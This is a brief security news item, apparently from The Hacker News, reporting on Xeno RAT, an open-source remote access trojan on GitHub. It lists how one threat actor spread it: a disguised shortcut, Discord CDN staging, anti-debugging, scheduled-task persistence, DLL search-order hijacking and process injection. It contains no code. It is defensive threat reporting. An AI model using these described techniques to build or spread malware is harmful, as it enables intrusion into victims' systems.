Open-Source Xeno RAT Trojan Emerges as a Potent Threat on GitHub

An “intricately designed” remote access trojan (RAT) called Xeno RAT has been made available on GitHub, making it available to other actors at no extra cost. Written in C# and compatible with Windows 10 and Windows 11 operating systems, the open-source RAT comes with a “comprehensive set of features for remote system management,” according to its developer, who goes by the name moom825 Read More

​The Hacker News

Xeno RAT Trojan

KEY FINDINGS

  • Xeno RAT possesses sophisticated functionalities and characteristics of advanced malware.
  • The malware’s developer opted to maintain it as an open-source project and made it accessible via GitHub.
  • A threat actor customized its settings and disseminated it via the Discord CDN.
  • The primary vector in the form of a shortcut file, disguised as a WhatsApp screenshot, acts as downloader.
  • The downloader downloads the zip archive from Discord CDN, extracts and executes the next stage payload.
  • A multi-step process is employed to generate the ultimate payload of the malware.
  • It looks for the debuggers, monitoring, and analysis tools before executing the final stage.
  • Utilizes anti-debugging techniques and follows a stealth operation process.
  • Malware adds itself as scheduled task for persistence.
  • Leverages the DLL search order functionality in Windows to load the malicious DLL into a trusted executable process.
  • Injects the malicious code (process injection) in the legit windows process.
  • Performs continuous monitoring of the compromised systems.
  • Employes extensive obfuscation techniques within files/code to evade detection effectively.
  • Uses obfuscated network traffic to receive instructions and updates.
  • Communicates with C2 with status updates and receives instructions at regular intervals.